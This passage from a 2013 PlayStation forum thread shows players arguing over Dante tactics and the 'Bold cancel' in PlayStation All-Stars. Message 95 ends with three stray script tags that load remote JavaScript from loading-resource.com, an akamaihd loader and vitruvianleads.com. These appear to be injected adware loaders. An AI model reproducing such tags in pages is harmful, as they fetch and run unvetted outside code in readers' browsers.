Wastelander
768 posts

Re: pb_mal is the best dante that ive fought so far

Jan 25, 2013

pb_mal wrote:
Lol he says last comment then posts again. Don't know how many times I said this to you Asia but get a life, and lol if I win last time Im hearing from this idiot

lol you never win i always beat u remember that fraud dante oh btw my buddy is on right now if you want to Destroy him lol hop online

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Message 91 of 189 (154 Views)
0 Likes
Uncharted Territory
1622 posts

Jan 25, 2013
Well in all honestly I don't think you know what your talking about no offense, and I don't doubt that you possibly could be better than them as I haven't seen you or them play, but saying your better strictly because you don't use a tactic that you find to be cheap is ridiculous.
Message 92 of 189 (146 Views)
0 Likes
Fender Bender
3755 posts

Jan 25, 2013
Annnnd He posts again lol I'll play him tommorow at whenever, Im not even on my ps3 right now so he'll have to wait. Send me his name. you can do as you said and leave now though because this thread was ok before you came
Message 93 of 189 (142 Views)
0 Likes
Fender Bender
3755 posts

Jan 25, 2013
I created approaches and combos with actually takes days to create. The bold cancel is done by everyone and I done it on my first try. You wouldnt understand that don't seeing as you just said I didn't understand my own character. I could show you all my combos and approaches tommorow because I'll be doing 1v1 tommorow. If you can't win a match without using a kill confirm that means you aren't good
Message 94 of 189 (133 Views)
0 Likes
Gaming Beast
2167 posts

[ Edited ]
Jan 25, 2013

pb_mal wrote:
The bold is a level one hit confirm Dante was meant to get kills other ways. Stop acting like you know what I'm talking about no offense
I didn't see them today... Just sayin', you may want to start using that Bold cancel.

You're a pretty good player, but you make yourself bad by limiting your options. Not sure if you heard me on the mic, but what you're doing is essentially the same as if you'd become an Olympic racer then decided running with muscular legs was too easy, chopped them off, replaced them with prosthetic and tried to go race with those instead.

You know that we're cool, but real talk, you should really lose the ego. You're talking trash to a player who beats me consistently when I didn't lose a single stock in the 3-4 games we played earlier. By the way, he also plays GC and is better with him than I (He couldn't even let me be better at my characters... *sigh* At least I think my BD is still better than his!). If you play him now with this same mentality of not wanting to KC, I will warn you that you are going to get exposed, it will get uploaded, and people will make fun of you.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 95 of 189 (129 Views)
0 Likes
Uncharted Territory
1622 posts

Jan 25, 2013
Ok I don't doubt you could beat me to start I hardly play this game right now due to lag and have played like 3-4 1v1 matches. To the part about kill confirms I disagree with that just because you use kill confirms doesn't mean you aren't good imo, but if that's what you think then ok that's fine.
Message 96 of 189 (125 Views)
0 Likes
Fender Bender
3755 posts

Jan 25, 2013
Not really, if I beat him he won't upload it lol
Message 97 of 189 (121 Views)
0 Likes
Uncharted Territory
1622 posts

Jan 25, 2013
And for the record I never said you didn't understand your own character I said its ridiculous that you claim your better then anyone who uses bold cancel, no offense but try to read things a bit more closely.
Message 98 of 189 (119 Views)
0 Likes
Fender Bender
3755 posts

Jan 25, 2013
I mean, there's a reason I'm so good at canceling and other Dantes cant pull off my simpliest combos. Bold cancel takes no skill and I've seen the worst Dante use it with ease. He beat the people he was playing because of it when they actually good. Get what I'm saying?
Message 99 of 189 (113 Views)
0 Likes
Wastelander
768 posts

Jan 25, 2013

Fromundaman wrote:

pb_mal wrote:
The bold is a level one hit confirm Dante was meant to get kills other ways. Stop acting like you know what I'm talking about no offense
I didn't see them today... Just sayin', you may want to start using that Bold cancel.

You're a pretty good player, but you make yourself bad by limiting your options. Not sure if you heard me on the mic, but what you're doing is essentially the same as if you'd become an Olympic racer then decided running with muscular legs was too easy, chopped them off, replaced them with prosthetic and tried to go race with those instead.

You know that we're cool, but real talk, you should really lose the ego. You're talking trash to a player who beats me consistently when I didn't lose a single stock in the 3-4 games we played earlier. By the way, he also plays GC and is better with him than I (He couldn't even let me be better at my characters... *sigh* At least I think my BD is still better than his!). If you play him now with this same mentality of not wanting to KC, I will warn you that you are going to get exposed, it will get uploaded, and people will make fun of you.

^FACT^^

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Message 100 of 189 (110 Views)
0 Likes